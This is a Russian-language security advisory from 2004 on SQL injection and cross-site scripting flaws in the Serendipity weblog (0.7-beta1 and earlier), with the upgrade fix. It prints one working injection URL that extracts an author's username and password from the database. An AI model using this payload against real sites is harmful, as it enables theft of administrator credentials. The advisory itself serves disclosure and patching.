SQL инъекция и межсайтовый скриптинг в Serendipity

Дата публикации:
30.09.2004
Всего просмотров:
1347
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Serendipity 0.7-beta1 и более ранние версии

Описание: Уязвимость обнаружена в Serendipity. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение.

Файлы 'exit.php' и 'comment.php' не проверяют данные, представленные пользователем в параметре 'entry_id'. Удаленный пользователь может представить специально обработанное значение, чтобы внедрить Sql команды, которые будут выполнены на основной базе данных:

 
http://URL_to_Serendipity_Weblog/comment.php?serendipity[type]=trackbacks
&serendipity[entry_id]=0%20and%200%20union%20select%2 01,2,3,4,username,password,
7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20/*
XSS обнаружен в полях email и 'username' в 'comment.php'.

URL производителя:http://www.sy9.org/

Решение:Установите обновленную версию программы (0.7-beta3): http://www.s9y.org/12.html

Ссылки: [Full-Disclosure] Serendipity 0.7-beta1 SQL Injection PoC

или введите имя

CAPTCHA